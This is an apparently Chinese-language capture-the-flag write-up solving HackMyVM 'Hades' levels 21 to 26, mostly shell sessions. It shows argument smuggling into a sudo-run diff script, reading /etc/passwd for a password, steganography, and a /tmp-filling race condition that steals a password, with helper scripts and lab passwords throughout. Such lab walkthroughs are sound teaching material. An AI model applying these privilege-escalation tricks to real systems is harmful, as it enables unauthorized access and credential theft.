{"id":724,"date":"2024-07-06T16:35:30","date_gmt":"2024-07-06T08:35:30","guid":{"rendered":"http:\/\/162.14.82.114\/?p=724"},"modified":"2024-07-06T16:35:30","modified_gmt":"2024-07-06T08:35:30","slug":"hmvlabs-hades21-30","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/724\/07\/06\/2024\/","title":{"rendered":"HMVLabs-Hades(21-30)"},"content":{"rendered":"

21 cassiopeia<\/h2>\n
cassiopeia@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root       cassiopeia 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root       root       4096 Apr  5 06:36 ..\n-rw-r--r-- 1 cassiopeia cassiopeia  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 cassiopeia cassiopeia 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 cassiopeia cassiopeia  807 Apr 23  2023 .profile\n-rw-r----- 1 root       cassiopeia   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root       cassiopeia  131 Apr  5 06:36 mission.txt\ncassiopeia@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^GyWbcpEpqMsqMsjilzX^\ncassiopeia@hades:~$ cat mission.txt \n################\n# MISSION 0x21 #\n################\n\n## EN ##\nUser clio hates spaces. \n\n## ES ##\nLa usuaria clio odia los espacios.\ncassiopeia@hades:~$ printf ' '\n cassiopeia@hades:~$ sudo -l\nMatching Defaults entries for cassiopeia on hades:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser cassiopeia may run the following commands on hades:\n    (clio) NOPASSWD: \/bin\/bash -c \/usr\/local\/src\/differences.sh\ncassiopeia@hades:~$ sudo -u clio \/bin\/bash -c \/usr\/local\/src\/differences.sh\nFile to compare:!\naaa\n\/usr\/bin\/diff: missing operand after 'aaa'\n\/usr\/bin\/diff: Try '\/usr\/bin\/diff --help' for more information.\ncassiopeia@hades:~$ cat \/usr\/local\/src\/differences.sh\n\n#!\/bin\/bash\necho File to compare:!\nread differences\nIFS=0 read file1 file2 <<< "$differences"\n\nif [[ "$differences" =~ \\ |\\' ]]\nthen\n   echo "No spaces!!"\nelse\n\/usr\/bin\/diff $file1 $file2\nfi\n\ncassiopeia@hades:~$ sudo -u clio \/bin\/bash -c \/usr\/local\/src\/differences.sh\nFile to compare:!\n\/dev\/null0\/pwned\/clio\/flagz.txt\n0a1\n> ^XUJbvPwAZYgoUgkpeSv^<\/code><\/pre>\n
22 clio<\/h2>\n
21: clio\/cqJqRPaUtuoUYXbaxnZq<\/p>\n
clio@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root clio 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root 4096 Apr  5 06:36 ..\n-rw-r--r-- 1 clio clio  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 clio clio 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 clio clio  807 Apr 23  2023 .profile\n-rw-r----- 1 root clio   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root clio  169 Apr  5 06:36 mission.txt\nclio@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^XUJbvPwAZYgoUgkpeSv^\nclio@hades:~$ cat mission.txt\n################\n# MISSION 0x22 #\n################\n\n## EN ##\nThe user cybele uses her lastname as a password.\n\n## ES ##\nLa usuaria cybele usa su apellido como password.\nclio@hades:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nDebian-exim:x:100:102::\/var\/spool\/exim4:\/usr\/sbin\/nologin\nmessagebus:x:101:103::\/nonexistent:\/usr\/sbin\/nologin\nftp:x:102:106:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\nsshd:x:103:65534::\/run\/sshd:\/usr\/sbin\/nologin\nexecutor:x:2102:2102::\/pwned\/executor:\/bin\/bash\ngemini:x:2101:2101::\/pwned\/gemini:\/usr\/sbin\/nologin\nhacker:x:2001:2001::\/pwned\/hacker:\/bin\/bash\nasia:x:2002:2002::\/pwned\/asia:\/bin\/bash\nasteria:x:2003:2003::\/pwned\/asteria:\/bin\/bash\nastraea:x:2004:2004::\/pwned\/astraea:\/bin\/bash\natalanta:x:2005:2005::\/pwned\/atalanta:\/bin\/bash\nathena:x:2006:2006::\/pwned\/athena:\/bin\/bash\naura:x:2007:2007::\/pwned\/aura:\/bin\/bash\naegle:x:2008:2008::\/pwned\/aegle:\/bin\/bash\ncalliope:x:2009:2009::\/pwned\/calliope:\/bin\/bash\ncalypso:x:2010:2010::\/pwned\/calypso:\/bin\/bash\ncassandra:x:2011:2011::\/pwned\/cassandra:\/bin\/bash\ncassiopeia:x:2012:2012::\/pwned\/cassiopeia:\/bin\/bash\nclio:x:2013:2013::\/pwned\/clio:\/bin\/bash\ncybele:x:2014:2014:UICacOPmJMWbKyPwNZod:\/pwned\/cybele:\/bin\/bash\ncynthia:x:2015:2015::\/pwned\/cynthia:\/bin\/bash\ndaphne:x:2016:2016::\/pwned\/daphne:\/bin\/bash\ndelia:x:2017:2017::\/pwned\/delia:\/bin\/bash\ndemeter:x:2018:2018::\/pwned\/demeter:\/bin\/bash\necho:x:2019:2019::\/pwned\/echo:\/bin\/bash\neos:x:2020:2020::\/pwned\/eos:\/bin\/bash\ngaia:x:2021:2021::\/pwned\/gaia:\/bin\/bash\nhalcyon:x:2022:2022::\/pwned\/halcyon:\/bin\/bash\nhebe:x:2023:2023::\/pwned\/hebe:\/bin\/bash\nhera:x:2024:2024::\/pwned\/hera:\/bin\/bash\nhermione:x:2025:2025::\/pwned\/hermione:\/bin\/bash\nhero:x:2026:2026::\/pwned\/hero:\/bin\/bash\nhestia:x:2027:2027::\/pwned\/hestia:\/bin\/bash\nianthe:x:2028:2028::\/pwned\/ianthe:\/bin\/bash\nirene:x:2029:2029::\/pwned\/irene:\/bin\/bash\niris:x:2030:2030::\/pwned\/iris:\/bin\/bash\nkore:x:2031:2031::\/pwned\/kore:\/bin\/bash\nleda:x:2032:2032::\/pwned\/leda:\/bin\/bash\nmaia:x:2033:2033::\/pwned\/maia:\/bin\/bash\nnephele:x:2034:2034::\/pwned\/nephele:\/bin\/bash\nnyx:x:2035:2035::\/pwned\/nyx:\/bin\/bash\npallas:x:2036:2036::\/pwned\/pallas:\/bin\/bash\npandora:x:2037:2037::\/pwned\/pandora:\/bin\/bash\npenelope:x:2038:2038::\/pwned\/penelope:\/bin\/bash\nphoebe:x:2039:2039::\/pwned\/phoebe:\/bin\/bash\nrhea:x:2040:2040::\/pwned\/rhea:\/bin\/bash\nselene:x:2041:2041::\/pwned\/selene:\/bin\/bash\nmaria:x:2042:2042::\/pwned\/maria:\/bin\/bash\nacantha:x:2043:2043::\/pwned\/acantha:\/bin\/bash\nalala:x:2044:2044::\/pwned\/alala:\/bin\/bash\nalthea:x:2045:2045::\/pwned\/althea:\/bin\/bash\nandromeda:x:2046:2046::\/pwned\/andromeda:\/bin\/bash\nanthea:x:2047:2047::\/pwned\/anthea:\/bin\/bash\naphrodite:x:2048:2048::\/pwned\/aphrodite:\/bin\/bash\nariadne:x:2049:2049::\/pwned\/ariadne:\/bin\/bash\narete:x:2050:2050::\/pwned\/arete:\/bin\/bash\nartemis:x:2051:2051::\/pwned\/artemis:\/bin\/rbash\nanonymous:x:2103:2103::\/home\/anonymous:\/bin\/bash\nmaritrini:x:2056:2056::\/home\/maritrini:\/bin\/bash\nclio@hades:~$ cat \/etc\/passwd | grep 'cybele'\ncybele:x:2014:2014:UICacOPmJMWbKyPwNZod:\/pwned\/cybele:\/bin\/bash<\/code><\/pre>\n
23 cybele<\/h2>\n
cybele@hades:~$ ls -la\ntotal 3220\ndrwxr-x--- 2 root   cybele    4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root   root      4096 Apr  5 06:36 ..\n-rw-r--r-- 1 cybele cybele     220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 cybele cybele    3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 cybele cybele     807 Apr 23  2023 .profile\n-rw-r----- 1 root   cybele      22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root   cybele 3263057 Dec 30  2021 fun.png\n-rw-r----- 1 root   cybele     163 Apr  5 06:36 mission.txt\ncybele@hades:~$ cat flagz.txt \n^bTsTIOmJELcaxEiIaCA^\ncybele@hades:~$ cat mission.txt \n################\n# MISSION 0x23 #\n################\n\n## EN ##\nUser cynthia sees things that others dont.\n\n## ES ##\nLa usuaria cynthia ve cosas que el resto no ven.<\/code><\/pre>\n
\u4f20\u5230\u672c\u5730\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u9690\u5199\uff1a<\/p>\n
                                                      .     **                                   \n                                                   *           *.                                 \n                                                                  ,*                              \n                                                                     *,                            \n                                             ,                         ,*                         \n                                          .,                              *,                       \n                                       \/                                    *                    \n                                    ,*                                        *,                  \n                                 \/.                                            .*.                 \n                                                                _____                     \n                __     __           _____         ____________      _____\\    \\            _____   \n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\  \n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    | \n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/| \n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\ncybele@hades.hackmyvm.eu's password: \nfun.png                                                                                                                                             100% 3187KB 458.6KB\/s   00:06    \nhgbe02@pwn:~\/temp$ foremost fun.png \nProcessing: fun.png\n|*|\nhgbe02@pwn:~\/temp$ binwalk fun.png \n\nDECIMAL       HEXADECIMAL     DESCRIPTION\n--------------------------------------------------------------------------------\n0             0x0             PNG image, 1600 x 1980, 8-bit\/color RGBA, non-interlaced\n41            0x29            Zlib compressed data, default compression\n\nhgbe02@pwn:~\/temp$ ls\n073  chfn  fun.png  music.iso  output  ret2text  tmp\nhgbe02@pwn:~\/temp$ cd output\/\nhgbe02@pwn:~\/temp\/output$ ls\naudit.txt  png\nhgbe02@pwn:~\/temp\/output$ cat audit.txt \nForemost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus\nAudit File\n\nForemost started at Wed Jul  3 13:57:59 2024\nInvocation: foremost fun.png\nOutput directory: \/home\/hgbe02\/temp\/output\nConfiguration file: \/etc\/foremost.conf\n------------------------------------------------------------------\nFile: fun.png\nStart: Wed Jul  3 13:57:59 2024\nLength: 3 MB (3263057 bytes)\n\nNum      Name (bs=512)         Size      File Offset     Comment\n\n0:      00000000.png           3 MB               0       (1600 x 1980)\nFinish: Wed Jul  3 13:57:59 2024\n\n1 FILES EXTRACTED\n\npng:= 1\n------------------------------------------------------------------\n\nForemost finished at Wed Jul  3 13:57:59 2024<\/code><\/pre>\n
\u5c1d\u8bd5\u4f7f\u7528stegsolve<\/code>\u770b\u4e00\u4e0b\uff0c\u53d1\u73b0\u5728Red plane 0<\/code>\u5904\u7684\u5de6\u4e0a\u89d2\u5b58\u5728\u5bc6\u7801\uff0cocr\u4e00\u4e0b\u5373\u53ef\uff1aQHLjXdGSiRShtWpMwFjj<\/strong><\/p>\n
24 cynthia<\/h2>\n
es:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root    cynthia 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root    root    4096 Apr  5 06:36 ..\n-rw-r--r-- 1 cynthia cynthia  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 cynthia cynthia 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 cynthia cynthia  807 Apr 23  2023 .profile\n-rw-r----- 1 root    cynthia   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root    cynthia  187 Apr  5 06:36 mission.txt\ncynthia@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^ZRSCKeYYlHkCEiHsEOI^\ncynthia@hades:~$ cat mission.txt \n################\n# MISSION 0x24 #\n################\n\n## EN ##\nUser daphne once told us: Gemini? gem-evil.hmv? WTF?\n\n## ES ##\nLa usuaria daphne nos dijo una vez: Gemini? gem-evil.hmv? WTF?\ncynthia@hades:~$ cat \/etc\/hosts\n127.0.0.1       localhost\n::1     localhost ip6-localhost ip6-loopback\nfe00::0 ip6-localnet\nff00::0 ip6-mcastprefix\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n172.66.0.66     hades\n127.0.0.1       hades.hmv\n127.0.0.1       whatsmypass.hmv\ncynthia@hades:~$ echo '127.0.0.1   gem-evil.hmv' >> \/etc\/hosts\n-bash: \/etc\/hosts: Permission denied\ncynthia@hades:~$ ls -la \/etc\/hosts\n-rw-r--r-- 1 root root 228 May 24 18:23 \/etc\/hosts<\/code><\/pre>\n
\u8fd9\u4e00\u9898\u53c2\u8003\u5de8\u9b54\u5e08\u5085\u7684wp<\/a><\/p>\n
hgbe02@pwn:~\/temp$ cat \/etc\/hosts | grep "gem"\n127.0.0.1       gem-evil.hmv\nhgbe02@pwn:~\/temp$ ssh -p 6666 cynthia@hades.hackmyvm.eu -L 1965:127.0.0.1:1965  # amfora\u9ed8\u8ba4\u7aef\u53e3\uff0c\u4e0d\u8981\u4fee\u6539\nhgbe02@pwn:~\/temp$ ss -atlup\nNetid           State            Recv-Q           Send-Q                     Local Address:Port                     Peer Address:Port          Process\nudp             UNCONN           0                0                              127.0.0.1:323                           0.0.0.0:*\nudp             UNCONN           0                0                                  [::1]:323                              [::]:*\ntcp             LISTEN           0                128                            127.0.0.1:1965                          0.0.0.0:*              users:(("ssh",pid=375,fd=5))\ntcp             LISTEN           0                128                                [::1]:1965                             [::]:*              users:(("ssh",pid=375,fd=4))\n# sudo apt-get install amfora\nhgbe02@pwn:~\/temp$ amfora gem-evil.hmv<\/code><\/pre>\n
\u8fd9\u8fb9\u8981\u5f00\u4fe9\u7ec8\u7aef\u8fdb\u884c\u64cd\u4f5c\uff0c\u540c\u65f6\u786e\u4fddssh\u8fde\u63a5\u7684\u90a3\u4e2a\u4e3b\u673a\u4e00\u76f4\u5728\u8fde\u63a5\u72b6\u6001\uff0c\u8fde\u63a5\u65b9\u4f1a\u5f39\u51fa\u6765\uff1a<\/p>\n
# Welcome to mi Gemini Server! \n## What are you looking for? \nEkdtKuXCJjlFKFpKgddX<\/code><\/pre>\n
\u6240\u4ee5\uff0c\u58a8\u5e08\u5085yyds\uff01\uff01\uff01\uff01<\/p>\n
25 daphne<\/h2>\n
daphne@hades:~$ ls -la\ntotal 36\ndrwxr-x--- 2 root   daphne 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root   root   4096 Apr  5 06:36 ..\n-rw-r--r-- 1 daphne daphne  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 daphne daphne 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 daphne daphne  807 Apr 23  2023 .profile\n-rw-r----- 1 root   daphne   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root   daphne  272 Apr  5 06:36 mission.txt\n-rw-r----- 1 root   daphne  174 Apr  5 06:36 old.sh\ndaphne@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^ieOhnUKZlYZSSrIPgaJ^\ndaphne@hades:~$ cat mission.txt \n################\n# MISSION 0x25 #\n################\n\n## EN ##\nThe user delia has a good memory, she only has to see her password for a few seconds to remember it.\n\n## ES ##\nLa usuaria delia tiene buena memoria, solo tiene que ver unos segundos su password para recordarlo.\ndaphne@hades:~$ cat old.sh \n\n#!\/bin\/bash\n#OUTPUT="PASSWORD_DELIA" <-- UPDATE IT!\nsecretfile=$(mktemp \/tmp\/XXX)\nchmod 664 "$secretfile"\nexec 5>"$secretfile"\necho $OUTPUT >&5\nsleep 0.01\nrm "$secretfile"\n\ndaphne@hades:~$ sudo -l\nMatching Defaults entries for daphne on hades:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser daphne may run the following commands on hades:\n    (delia) NOPASSWD: \/bin\/bash -c \/usr\/local\/src\/new.sh<\/code><\/pre>\n
\u672c\u6765\u60f3\u5199\u4e2a\u811a\u672c\u6761\u4ef6\u7ade\u4e89\u51fa\u6765\u7684\uff0c\u4f46\u662f\u4e0d\u6e05\u695a\u8def\u5f84\uff0c\u8fd9\u91cc\u7fa4\u4e3b\u7684\u65b9\u6cd5\u662f\u5c06 \/tmp<\/code>\u76ee\u5f55\u5199\u6ee1\uff0c\u7136\u540e\u5220\u6389\u4e00\u4e2a\uff0c\u8fd9\u6837\u811a\u672c\u53ea\u80fd\u521b\u5efa\u6211\u4eec\u5220\u6389\u7684\u90a3\u4e2a\u6587\u4ef6\u540d\uff0c\u7136\u540e\u6211\u4eec\u5199\u4e2a\u811a\u672c\u5faa\u73af\u8fdb\u884c\u8bfb\u53d6\u5373\u53ef\u3002
\nrpj7\u5e08\u5085\u7684\u601d\u8def\u662f\u5199\u4e86\u4e00\u4e2a\u5faa\u73af\u8fdb\u884c\u521b\u5efa\u6587\u4ef6\uff0c\u7fa4\u4e3b\u5e08\u5085\u5728\u672c\u5730\u628a\u76ee\u5f55\u634b\u5b8c\u4e86\u4ee5\u540e\u53d1\u8fc7\u53bb\u7684\uff0c\u4ed6\u7ed9\u4e86\u6211\u4e00\u4e2ademo:<\/p>\n
echo {{a..c}{1..3}{A..C}}{{a..c}{1..3}{A..C}}{{a..c}{1..3}{A..C}}|tr ' ' '\\n'|sed 's#^#touch \/tmp\/#g' > aaa<\/code><\/pre>\n
\u8fd0\u884c\u5b8c\u5373\u53ef\u5f97\u5230\u53ef\u4ee5\u586b\u5145\u6240\u6709\/tmp\/XXX<\/code>\u7684\u547d\u4ee4\uff0c\u517120\u4f59\u4e07\u884c\uff0c\u7fa4\u53cb\u6709\u4eba\u8fd0\u884c\u8fc7\u4e86\uff0c\u524d\u4eba\u683d\u6811\u540e\u4eba\u4e58\u51c9\uff0c\u518d\u8fd0\u884c\u4e00\u6b21\u5373\u53ef\uff1a<\/p>\n
# terminal1\ndaphne@hades:~$ ls -la \/tmp\/ctf\n-rw-r--r-- 1 daphne daphne 0 Jul  3 11:23 \/tmp\/ctf\ndaphne@hades:~$ rm \/tmp\/ctf\ndaphne@hades:~$ while :;do cat \/tmp\/ctf >> \/tmp\/pass; done\ncat: \/tmp\/ctf: No such file or directory\ncat: \/tmp\/ctf: No such file or directory\ncat: \/tmp\/ctf: No such file or directory\ncat: \/tmp\/ctf: No such file or directory\ncat: \/tmp\/ctf: No such file or directory\n..........\n# terminal2\ndaphne@hades:~$ sudo -u delia \/bin\/bash -c \/usr\/local\/src\/new.sh\n^[[Amktemp: failed to create file via template '\/tmp\/XXX': File exists\nchmod: cannot access '': No such file or directory\n\/usr\/local\/src\/new.sh: line 6: : No such file or directory\n\/usr\/local\/src\/new.sh: line 7: 5: Bad file descriptor\nrm: cannot remove '': No such file or directory\ndaphne@hades:~$ sudo -u delia \/bin\/bash -c \/usr\/local\/src\/new.sh\ndaphne@hades:~$ sudo -u delia \/bin\/bash -c \/usr\/local\/src\/new.sh\nmktemp: failed to create file via template '\/tmp\/XXX': File exists\nchmod: cannot access '': No such file or directory\n\/usr\/local\/src\/new.sh: line 6: : No such file or directory\n\/usr\/local\/src\/new.sh: line 7: 5: Bad file descriptor\nrm: cannot remove '': No such file or directory\n\n# terminal1\ndaphne@hades:~$ cat \/tmp\/pass | uniq -d\nbNCvocyOpoMVeCtxrhTt<\/code><\/pre>\n
\u8fd9\u9053\u9898\u7528python\u4e5f\u53ef\u4ee5\u8fdb\u884c\u5229\u7528\uff0c\u5728\/var\/tmp<\/code>\u770b\u5230\u67d0\u4e2a\u5e08\u5085\u7684\u5229\u7528\u65b9\u6cd5\uff1a<\/p>\n
import os\nimport string\n\ndic = string.ascii_letters + string.digits\nfor i in dic:\n    for j in dic:\n        for k in dic:\n            os.system(f'touch \/tmp\/{i+j+k}')<\/code><\/pre>\n
26 delia<\/h2>\n
\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240c\u250c\u240a\u2592\u23bc\u250c\n\u2409\u2592\u23bd\n: \u240c\u250c\u240a\u2592\u23bc\u250c: \u240c\u23ba\u2514\u2514\u2592\u253c\u240d \u253c\u23ba\u251c \u00b0\u23ba\u2524\u253c\u240d\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u252c\n\u23ba\u2592\u2514\u240b\n\u240d\u240a\u250c\u240b\u2592\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u250c\u23bd -\u250c\u2592\n\u251c\u23ba\u251c\u2592\u250c 48\n\u240d\u23bc\u252c\u2502\u23bc-\u2502--- 2 \u23bc\u23ba\u23ba\u251c  \u240d\u240a\u250c\u240b\u2592  4096 A\u23bb\u23bc  5 06:36 .\n\u240d\u23bc\u252c\u2502\u23bc-\u2502\u23bc-\u2502 1 \u23bc\u23ba\u23ba\u251c  \u23bc\u23ba\u23ba\u251c   4096 A\u23bb\u23bc  5 06:36 ..\n-\u23bc\u252c-\u23bc--\u23bc-- 1 \u240d\u240a\u250c\u240b\u2592 \u240d\u240a\u250c\u240b\u2592   220 A\u23bb\u23bc 23  2023 .\u2409\u2592\u23bd\n \u250c\u23ba\u00b1\u23ba\u2524\u251c\n-\u23bc--\u23bc----- 1 \u240d\u240a\u250c\u240b\u2592 \u240d\u240a\u250c\u240b\u2592  3539 A\u23bb\u23bc  5 06:36 .\u2409\u2592\u23bd\n\u23bc\u240c\n-\u23bc\u252c-\u23bc--\u23bc-- 1 \u240d\u240a\u250c\u240b\u2592 \u240d\u240a\u250c\u240b\u2592   807 A\u23bb\u23bc 23  2023 .\u23bb\u23bc\u23ba\u00b0\u240b\u250c\u240a\n-\u23bc\u252c-\u23bc----- 1 \u23bc\u23ba\u23ba\u251c  \u240d\u240a\u250c\u240b\u2592    22 A\u23bb\u23bc  5 06:36 \u00b0\u250c\u2592\u00b1\u2265.\u251c\u2502\u251c\n-\u23bc\u252c-\u23bc----- 1 \u23bc\u23ba\u23ba\u251c  \u240d\u240a\u250c\u240b\u2592   150 A\u23bb\u23bc  5 06:36 \u2514\u240b\u23bd\u23bd\u240b\u23ba\u253c.\u251c\u2502\u251c\n---\u2502--\u2502--- 1 \u240d\u240a\u250c\u240b\u2592 \u240d\u240a\u250c\u240b\u2592 15952 A\u23bb\u23bc  5 06:36 \u23bd\n\u23ba\u252c\u23bb\u2592\u23bd\u23bd<\/code><\/pre>\n
\u4f60\u6ca1\u770b\u9519\uff0c\u5c31\u662f\u8fd9\u6837\u7684\uff0c\u4e0d\u662f\u4e71\u7801\uff0c\u53ea\u662f\u5b57\u7b26\u96c6\u4e0d\u4e00\u6837\uff0c\u4f46\u662f\u6570\u5b57\u662f\u6b63\u5e38\u663e\u793a\u7684\uff0c\u5c1d\u8bd5\u8f6c\u5316\u4e3a\u6570\u5b57\u8fdb\u884c\u8868\u793a\uff1a<\/p>\n
\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240c\u250c\u240a\u2592\u23bc\u250c\n\u2409\u2592\u23bd\n: \u240c\u250c\u240a\u2592\u23bc\u250c: \u240c\u23ba\u2514\u2514\u2592\u253c\u240d \u253c\u23ba\u251c \u00b0\u23ba\u2524\u253c\u240d\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u252c\n\u23ba\u2592\u2514\u240b\n\u240d\u240a\u250c\u240b\u2592\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u250c\u23bd -\u250c\u2592\n\u251c\u23ba\u251c\u2592\u250c 48\n\u240d\u23bc\u252c\u2502\u23bc-\u2502--- 2 \u23bc\u23ba\u23ba\u251c  \u240d\u240a\u250c\u240b\u2592  4096 A\u23bb\u23bc  5 06:36 .\n\u240d\u23bc\u252c\u2502\u23bc-\u2502\u23bc-\u2502 1 \u23bc\u23ba\u23ba\u251c  \u23bc\u23ba\u23ba\u251c   4096 A\u23bb\u23bc  5 06:36 ..\n-\u23bc\u252c-\u23bc--\u23bc-- 1 \u240d\u240a\u250c\u240b\u2592 \u240d\u240a\u250c\u240b\u2592   220 A\u23bb\u23bc 23  2023 .\u2409\u2592\u23bd\n \u250c\u23ba\u00b1\u23ba\u2524\u251c\n-\u23bc--\u23bc----- 1 \u240d\u240a\u250c\u240b\u2592 \u240d\u240a\u250c\u240b\u2592  3539 A\u23bb\u23bc  5 06:36 .\u2409\u2592\u23bd\n\u23bc\u240c\n-\u23bc\u252c-\u23bc--\u23bc-- 1 \u240d\u240a\u250c\u240b\u2592 \u240d\u240a\u250c\u240b\u2592   807 A\u23bb\u23bc 23  2023 .\u23bb\u23bc\u23ba\u00b0\u240b\u250c\u240a\n-\u23bc\u252c-\u23bc----- 1 \u23bc\u23ba\u23ba\u251c  \u240d\u240a\u250c\u240b\u2592    22 A\u23bb\u23bc  5 06:36 \u00b0\u250c\u2592\u00b1\u2265.\u251c\u2502\u251c\n-\u23bc\u252c-\u23bc----- 1 \u23bc\u23ba\u23ba\u251c  \u240d\u240a\u250c\u240b\u2592   150 A\u23bb\u23bc  5 06:36 \u2514\u240b\u23bd\u23bd\u240b\u23ba\u253c.\u251c\u2502\u251c\n---\u2502--\u2502--- 1 \u240d\u240a\u250c\u240b\u2592 \u240d\u240a\u250c\u240b\u2592 15952 A\u23bb\u23bc  5 06:36 \u23bd\n\u23ba\u252c\u23bb\u2592\u23bd\u23bd\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240c\u2592\u251c \u00b0\u250c\u2592\u00b1\u2265.\u251c\u2502\u251c  \u2260 \u2502\u2502\u240d -\u23bb\n\u2409\u2592\u23bd\n: \u2502\u2502\u240d: \u240c\u23ba\u2514\u2514\u2592\u253c\u240d \u253c\u23ba\u251c \u00b0\u23ba\u2524\u253c\u240d\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u23ba\u240d -A\u253c -\u2534\u251c\u240d1 < \u00b0\u250c\u2592\u00b1\u2265.\u251c\u2502\u251c   \n   94   81  102   97   72   80  121   69  113   77  101  112  115   79  100   77\n  120   81   67   81   94   10\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240a\u240c\n\u23ba $LANG\n\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240a\u253c\u2534 \u2260\u00b1\u23bc\u240a\u23bb LANG\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ LANG=\u240a\u253c US.UTF-8\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240a\u2502\u23bb\u23ba\u23bc\u251c LANG=\u240a\u253c US.UTF-8\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u2524\u253c\u23bd\u240a\u251c 